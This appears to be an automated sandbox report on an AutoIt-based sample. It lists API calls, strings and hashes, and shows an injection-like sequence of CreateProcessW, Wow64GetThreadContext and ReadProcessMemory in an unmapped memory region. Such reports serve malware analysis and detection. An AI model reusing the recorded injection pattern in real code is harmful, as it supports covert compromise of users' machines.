CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A36
ShowWindow.USER32(00000000,?,?), ref: 00BC3A4A
ShowWindow.USER32(00000000,?,?), ref: 00BC3A53

Strings

edit, xrefs: 00BC3A30
AutoIt v3, xrefs: 00BC3A0D, 00BC3A12, 00BC3A13

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 90d994f3a885efdb789f0d435c1e09abf2da62c36f272d0e0ce1a1d28660b242
Instruction ID: c002f751fa81f5185126ee267260849d434a9c2cb3c7eff49f0f29eb0410a458
Opcode Fuzzy Hash: 90d994f3a885efdb789f0d435c1e09abf2da62c36f272d0e0ce1a1d28660b242
Instruction Fuzzy Hash: A7F03A706402907EEA3017236C08F2B3E7DE7C7F51B01007EB900A6170C6A50801DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 038D2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038D2300: Sleep.KERNELBASE(000001F4), ref: 038D2311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 038D2540

Strings

BXKEA2FV4Y2SX, xrefs: 038D25A3, 038D25A6

Memory Dump Source

Source File: 00000000.00000002.1448279966.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38d0000_150-425-2024.jbxd

Similarity

API ID: CreateFileSleep
String ID: BXKEA2FV4Y2SX
API String ID: 2694422964-2806533363
Opcode ID: 820ce0a51d15bb1c21f4dd58ffee2f5437537d6958edd2e4d7bfdcf385d8c48a
Instruction ID: 25d6a5c6bfdef0ba16339a59b5ae5822714df0f67157fe274e920a97b7ed4ed7
Opcode Fuzzy Hash: 820ce0a51d15bb1c21f4dd58ffee2f5437537d6958edd2e4d7bfdcf385d8c48a
Instruction Fuzzy Hash: B6519030D14348EBEF11DBE4C854BEEBB79AF58700F004598E609FB2C0DAB95A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BFD5EC

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

_memset.LIBCMT ref: 00BC418D
_wcscpy.LIBCMT ref: 00BC41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC41F1

Strings

Line: , xrefs: 00BFD615

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: c8d541a9e0f3d9a64acc120d4c03041643860fcf331cb774f9af9144ca38db18
Instruction ID: 17caf2f7906f6b2593873f7f442ebb4912ad6dbed584ecaef4699d5dd3d9d98f
Opcode Fuzzy Hash: c8d541a9e0f3d9a64acc120d4c03041643860fcf331cb774f9af9144ca38db18
Instruction Fuzzy Hash: B931C271008355AAD721EB60DC46FDF77ECAF44310F1449AEF685960A2EF70A748CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BE564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00BE56AB
_memcpy_s.LIBCMT ref: 00BE571D
__read_nolock.LIBCMT ref: 00BE577B
__filbuf.LIBCMT ref: 00BE579E
_memset.LIBCMT ref: 00BE57E2

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 43a4508abf5ee6780afb8e6cc5f4291aa9e80372cbb5d716ff6012de755a4a92
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: D151A270A00B85DFDB349FAAC8846AE77E5EF40328F2487A9F835962D1D7709D609B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00BC4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4F6F

_free.LIBCMT ref: 00BFE68C
_free.LIBCMT ref: 00BFE6D3

Part of subcall function 00BC6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00BFE462
Bad directive syntax error, xrefs: 00BFE6BB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 4fa2b177ffe017da28d9f37546aa86792066e7cbbbb3f18bab209fb44ce85692
Instruction ID: ed2acf99b6a14ef9e19fd3724e3049ed65459c05cfa182d0b215eae90a6053ce
Opcode Fuzzy Hash: 4fa2b177ffe017da28d9f37546aa86792066e7cbbbb3f18bab209fb44ce85692
Instruction Fuzzy Hash: 5D913771910219AFCF14EFA4C8919FDB7F4FF19310B1444AEE925AB2A1DB30E949DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BC35A1,SwapMouseButtons,00000004,?), ref: 00BC35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC35F5
RegCloseKey.KERNELBASE(00000000,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC3617

Strings

Control Panel\Mouse, xrefs: 00BC35D2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
Instruction ID: 78e259413107d9fabd9c2cb0a2992bf1e539994754f19cce8ddc0a2bd9031dfe
Opcode Fuzzy Hash: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
Instruction Fuzzy Hash: 60114575614208BFDB208F64DC80EAEBBF8EF45B41F4184A9E805D7210E2729E419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 038D1300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 038D1ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 038D1B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D1B73

Memory Dump Source

Source File: 00000000.00000002.1448279966.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38d0000_150-425-2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 9618a0c4c45484d5c98a21db57deb21f7db7b29ff273f39047fcddaeb2876ed5
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 3D621B34A14258DBEB24CFA4C844BEEB376EF58300F1095A9D10DEB394E7799E81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00C297E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00BC5045: _fseek.LIBCMT ref: 00BC505D

Part of subcall function 00C299BE: _wcscmp.LIBCMT ref: 00C29AAE
Part of subcall function 00C299BE: _wcscmp.LIBCMT ref: 00C29AC1

_free.LIBCMT ref: 00C2992C
_free.LIBCMT ref: 00C29933
_free.LIBCMT ref: 00C2999E

Part of subcall function 00BE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9C64), ref: 00BE2FA9
Part of subcall function 00BE2F95: GetLastError.KERNEL32(00000000,?,00BE9C64), ref: 00BE2FBB

_free.LIBCMT ref: 00C299A6

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction ID: 777489c050afab504837906eba309ebc3bc3b78192f4a0021c37071d438e48d3
Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction Fuzzy Hash: F9514DB1904258AFDF249F65DC81A9EBBB9EF48310F1404AEF609A7241DB716E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00BE493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BE49D0
__flush.LIBCMT ref: 00BE49F0
__write.LIBCMT ref: 00BE4A23
__flsbuf.LIBCMT ref: 00BE4A51

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: a80e11a0305cc53c86cfa2dd50a4ebbb7c64e53084c926b33149ea0add4be7b2
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 8D41E3746006869FDF28CEABC8849AF77E6EF84360B2486FDE855D7641D770DD408B44

Uniqueness

Uniqueness Score: -1.00%

Function 00BC73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BFEE62
GetOpenFileNameW.COMDLG32(?), ref: 00BFEEAC

Part of subcall function 00BC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC48A1,?,?,00BC37C0,?), ref: 00BC48CE

Part of subcall function 00BE09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE09F4

Strings

X, xrefs: 00BFEE7A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 7b8584637185ab5e111c0fd283b5bd8cf2e76af740676a36cee85071d9a652af
Instruction ID: d39445202f551378695127414c9276e1faa444fd654b81c2aa1ba1ab319a52ce
Opcode Fuzzy Hash: 7b8584637185ab5e111c0fd283b5bd8cf2e76af740676a36cee85071d9a652af
Instruction Fuzzy Hash: 6F21C370A002989BCF15DF94C845BEE7BF89F49300F00809AE508E7342DBB45A8D8FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C29036
__fread_nolock.LIBCMT ref: 00C2904B

Strings

EA06, xrefs: 00C2907D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: a388a26fa7e76691815fb3275413bf3cd6a28925354a9ad77c7e0fda7b5ed9b7
Instruction ID: 47e0c314783ed147561b5beb9a0d8114375a44931842f559156bd63e2a28dd7d
Opcode Fuzzy Hash: a388a26fa7e76691815fb3275413bf3cd6a28925354a9ad77c7e0fda7b5ed9b7
Instruction Fuzzy Hash: AD01F9728042586EDB28C6A9D816EEE7BFCDB05301F00419AF552D2181E5B5A7048760

Uniqueness

Uniqueness Score: -1.00%

Function 00C29B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C29B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C29B99

Strings

aut, xrefs: 00C29B93

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: b187b644ed2171e6cf2e90b46196b0e6d2a041393a149993f7cd066e2eef0f72
Instruction ID: ea6a6491129f6f3a55b1d32f84392bfff86c5c1081d62053b0633fb3e345a5b2
Opcode Fuzzy Hash: b187b644ed2171e6cf2e90b46196b0e6d2a041393a149993f7cd066e2eef0f72
Instruction Fuzzy Hash: 97D05E7954030DABDB209B90DC0EF9E772CE704700F0042B1BE94910A1DEF155998B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C3CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f44eadd2d3100e6252cb30b608886385310ad3ac3887bef47f96bab29ea5859
Instruction ID: dd3e593bd89f006f54732aac2c5a9019a01f989c295c0f70156b0ec4b9374842
Opcode Fuzzy Hash: 3f44eadd2d3100e6252cb30b608886385310ad3ac3887bef47f96bab29ea5859
Instruction Fuzzy Hash: 70F15870A183019FC714DF29C484A6ABBE5FF88314F14896EF8AA9B351D731E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE03D3
Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE03DB
Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE03E6
Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE03F1
Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE03F9
Part of subcall function 00BE03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE0401

Part of subcall function 00BD6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BCFA90), ref: 00BD62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BCFB2D
OleInitialize.OLE32(00000000), ref: 00BCFBAA
CloseHandle.KERNEL32(00000000), ref: 00C049F2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e2fedb55bf8573fbec08eb7e75b8a99b86b5da440aea12af6e14aad705e279d2
Instruction ID: 49c42850e0f83ffd2b8e00a4a39758472c092ee5a0f616cc28715627fde6b790
Opcode Fuzzy Hash: e2fedb55bf8573fbec08eb7e75b8a99b86b5da440aea12af6e14aad705e279d2
Instruction Fuzzy Hash: FD81A7B49052908ECB84EF39E954B1DBAE4FB99308B10857EA419CB372EB3548458F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00BC43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BC4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BC44C3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: df6ce22ae5e3dd9c548d1a01ff814a713cbf137067775f92d3d5f921ad95cccd
Instruction ID: fb37f350011a5729bc75eaa09466fba4103dd4aa84e619b08194433524831513
Opcode Fuzzy Hash: df6ce22ae5e3dd9c548d1a01ff814a713cbf137067775f92d3d5f921ad95cccd
Instruction Fuzzy Hash: A131BFB05043008FC724DF24D894B9BBBE8FB49308F1009AEF59AC7341DB75AA48CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BE594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00BE5963

Part of subcall function 00BEA3AB: __NMSG_WRITE.LIBCMT ref: 00BEA3D2
Part of subcall function 00BEA3AB: __NMSG_WRITE.LIBCMT ref: 00BEA3DC

__NMSG_WRITE.LIBCMT ref: 00BE596A

Part of subcall function 00BEA408: GetModuleFileNameW.KERNEL32(00000000,00C843BA,00000104,?,00000001,00000000), ref: 00BEA49A
Part of subcall function 00BEA408: ___crtMessageBoxW.LIBCMT ref: 00BEA548

Part of subcall function 00BE32DF: ___crtCorExitProcess.LIBCMT ref: 00BE32E5
Part of subcall function 00BE32DF: ExitProcess.KERNEL32 ref: 00BE32EE

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00BE1013,?), ref: 00BE598F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 2c23d6390dc72c8b33590c8ad15471600c6b6b5d9a55f06714d8f5d151461034
Instruction ID: 26acce37cf9e08a512f3b19625e17a1d6a76818711f9f9910fdc5bf79f491f9a
Opcode Fuzzy Hash: 2c23d6390dc72c8b33590c8ad15471600c6b6b5d9a55f06714d8f5d151461034
Instruction Fuzzy Hash: E501D639200A92DED6352767DC457AD72C8DF51B79F1000AAF405AB2C2DB709D014365

Uniqueness

Uniqueness Score: -1.00%

Function 00C29B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C297D2,?,?,?,?,?,00000004), ref: 00C29B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C29B5B
CloseHandle.KERNEL32(00000000,?,00C297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C29B62

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

